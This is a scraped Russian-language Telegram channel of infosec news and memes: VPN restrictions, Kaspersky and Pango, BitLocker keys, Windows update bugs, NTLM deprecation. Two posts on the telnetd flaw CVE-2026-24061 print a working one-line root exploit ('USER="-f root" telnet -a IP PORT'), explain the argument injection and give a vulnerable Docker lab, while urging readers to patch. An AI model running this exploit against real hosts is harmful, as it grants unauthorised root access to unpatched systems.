папкин ИБшник, мамкин хацкер
55 subscribers
776 photos
78 videos
19 files
244 links
Круглосуточный уголок shit-постинга на темы около DevSecOps, Reverse-Enginnering, NetDiscovery, DataMining. Ну и конечно же мемесы.
Download Telegram
Не заблокированным, а MAXимально безопасным 🫣
Please open Telegram to view this post
VIEW IN TELEGRAM
Let's Encrypt начал выдавать бесплатные SSL-сертификаты для IP-адресов

С 15 января 2026 года крупнейший бесплатный центр сертификации Let's Encrypt официально запустил выдачу TLS-сертификатов для IP-адресов — как IPv4, так и IPv6.

Из минусов - время жизни сертификата 7 дней.
Уже думаю все в курсе, что официального дилера LADA слили (по заявлениям) аж на 500 гигов. Пока коллеги по цеху объявляют одну неделю, я пожалуй объявлю другую:

Астрологи предсказывают неделю паролей Admin@123

🤣
Please open Telegram to view this post
VIEW IN TELEGRAM
👾11
Пункта обмена записками WB не суще....

https://privatebin.wildberries.ru/
Там некий товарищ из информационной политики РФ Антон Горелкин заявил, мол, ограничение и штрафы на использование VPN даже не обсуждаются.

И так:
— Штрафы за VPN не планируются и не обсуждаются
→ Вы здесь ←
— Штрафы за VPN обсуждается в Госдуме
— VPN-сервисы не выполняют требования властей
— VPN-сервисы используют мошенники
— Теперь за VPN будут штрафовать


🙂
Please open Telegram to view this post
VIEW IN TELEGRAM
папкин ИБшник, мамкин хацкер
«Лаборатории Касперского» и всем ее дочерним, аффилированным или материнским компаниям запрещено продавать свою продукцию в США с 20 июля. Они могут предоставлять обновления существующим клиентам до 29 сентября. Дополнительная информация: https://www.wa…
Напомню, что после бана Kaspersky в США (2024 год был, писал об этом) - всех американских пользователей антивируса автоматически мигрировали на UltraAV от Pango Group. Эти же ребята, в свою очередь, владелицы кучи VPN сервисов:
- Hotspot Shield
- Betternet
- Touch VPN
- VPN 360
- Ultra VPN

В тусовке (особенно на русских форумах) видят тут “одного хозяина”, потому что:
- Pango старый технологический партнер Касперского
- После бана Касперского в США именно Pango подхватил пользователей
- у Pango куча VPN под разными брендами (white-label модель), на которой как я понимаю работал и Secure Connect от Каспера
Microsoft официально передала ФБР ключи для расшифровки данных BitLocker

Начиная с Windows 11 24H2 Microsoft автоматически включает шифрование BitLocker на всех совместимых устройствах.

При входе через учётную запись Microsoft ключ шифрования автоматически загружается в облако OneDrive — без согласия пользователя.
Еще даже не успели присвоить CVE

В telnetd начиная с версии 1.9.3 (май 2015 года) и вплоть до 2.7 (включительно) существует уязвимость, которая позволяет любому подключиться от имени root, без проверки пароля.

Под ударом практически все дистрибутивы Linux, которые ставят inetutils-telnetd из репозиториев:
— Debian / Ubuntu / Kali / Trisquel и производные
— Многие embedded-системы, старые роутеры, IoT-устройства, промышленные контроллеры, где до сих пор жив telnet

Shodan сейчас находит 732,350 устройств по всему миру.
А чтобы эксплуатировать, достаточно одной команды:
$ USER="-f root" telnet -a IP PORT
папкин ИБшник, мамкин хацкер
Еще даже не успели присвоить CVE В telnetd начиная с версии 1.9.3 (май 2015 года) и вплоть до 2.7 (включительно) существует уязвимость, которая позволяет любому подключиться от имени root, без проверки пароля. Под ударом практически все дистрибутивы Linux…
UPDATE: CVE-2026-24061 (взлом жеппы 2026)

Имеем critical 9.8 в telnetd, которой 11 лет от роду. Один эксплойт — и ты root на удалёнке.

Корпоративные legacy-системы, embedded-девайсы и забытые серверы до сих пор висят на порту 23. GreyNoise уже ловит массовые сканы.

Что произошло?
В 2015 году в GNU Inetutils добавили %U в шаблон вызова login, чтоб автологин работал без Kerberos. Коммит казался безобидным:
/usr/bin/login -p -h %h %?u{-f %u}{%U}

Но никто не подумал, что Telnet позволяет клиенту слать любые переменные окружения (RFC 1572). А %U — это тупо подстановка $USER.
Эксплойт в одну строку 🃏
USER="-f root" telnet -a 1.2.3.4 23

Бум:
1. Клиент шлёт USER="-f root" через Telnet negotiation.
2. telnetd подставляет в шаблон → /usr/bin/login -p -h ... -f root
3. login видит -f (уже аутентифицирован) → скипает пароль.
4. Привет, root shell без единого байта аутентификации.

Это классический argument injection (CWE-88). Не sanitization, не фильтры — просто подставили пользовательский ввод в аргументы.

Последствия?
Remote root на всех версиях GNU Inetutils telnetd 1.9.3–2.7 (почти 11 лет).
Не патчится старыми версиями — нужен апдейт до 2.5+ или патч от вендора.
Shodan/Censys: сотни тысяч устройств на 23 порту.
Уже эксплуатируют: persistence via SSH keys, second-stage payloads.

Тестовая лаба в Docker (чтоб самому пощупать)
FROM debian:11-slim

ENV DEBIAN_FRONTEND=noninteractive
RUN apt-get update && \
apt-get install -y --no-install-recommends \
inetutils-telnetd=2:2.0-1+deb11u2 \
telnet && \
rm -rf /var/lib/apt/lists/*

RUN useradd user1 && \
sed -i 's/#<off># telnet/telnet/' /etc/inetd.conf

COPY docker-entrypoint.sh /docker-entrypoint.sh

EXPOSE 23
CMD ["/usr/sbin/inetutils-inetd", "-d"]



В 2026 году telnet всё ещё жив? Linux-админы, которые его не вырубили в 2010-х — это новый вид мазохизма. SSH существует, ребята. Отключайте telnetd найух, обновляйтесь или хотя бы firewall'те 23 порт. Иначе в 2027 будем читать про массовые root'ы в embedded-роутерах и старых серверах.
VPN больше не могут обходить белые списки — СМИ

Ранее ВПН уклонялись от ограничений мобильного интернета, так как использовали российские сервера с "белыми" IP-адресами. Как пишут СМИ, РКН запретил передавать такие разрешённые IP в аренду.
👍1
Forwarded from Чёрный Треугольник (Полина)
☝🏻Январское обновление Windows 11 ломает ПК пользователей

Microsoft официально признала критическую ошибку в обязательном обновлении безопасности KB5074109, которое вышло 13 января 2026 года для Windows 11 версий 24H2 и 25H2.

После установки патча часть устройств уходит в циклическую перезагрузку или показывает «чёрный экран смерти» с ошибкой UNMOUNTABLE_BOOT_VOLUME (код 0xED), которая обычно указывает на повреждение загрузочного сектора.💀

При этом баг затрагивает только физические устройства — на виртуальных машинах всё работает нормально.

☝🏻Проблемы с загрузкой — лишь верхушка айсберга. Пользователи также жалуются на зависание Outlook, сброс обоев на чёрный цвет, неработающий режим сна S3 и случайные чёрные экраны на системах с GPU Nvidia. 🖥

Также ломаются приложения для работы с облачными хранилищами — OneDrive и Dropbox перестают корректно открывать и сохранять файлы.

Корпорация уже выпустила два экстренных исправления: KB5077744 (17 января) устранил проблемы с Remote Desktop и выключением ПК, а KB5078127 (24 января) починил Outlook и облачные приложения. 🛠

Однако критический баг с незагружающейся системой до сих пор не исправлен — пострадавшим приходится откатывать обновление через среду восстановления WinRE или полностью переустанавливать Windows с ISO-образа.
================
👁 Hacker | 👁 Comp | 👁 Agent
Please open Telegram to view this post
VIEW IN TELEGRAM
😀😀😀
Please open Telegram to view this post
VIEW IN TELEGRAM
Нашлась более расширенная версия
1
В декабре 2025 года ботнет Aisuru (Kimwolf) провел мощнейшую DDoS-атаку, которая достигла пиковой мощности в 31,4 Тбит/с и 200 млн запросов в секунду.

Это новый рекорд за всю историю наблюдений.
1
Microsoft НАКОНЕЦ-ТО отключит NTLM по умолчанию в будущих релизах Windows!

Компания Microsoft объявила, что отключит протокол аутентификации NTLM 30-летней давности по умолчанию в грядущих версиях Windows. Причиной для этого послужили многочисленные уязвимости, которые открывают дорогу кибератакам.
Forwarded from vx-underground
Privacy nerds:
> Tuta email
> XMR
> Qubes OS
> Tails
> No social media
> Live in a cave

Epstein:
> "hello i am sex trafficking children"
> Attached image as proof
> Sent from iPhone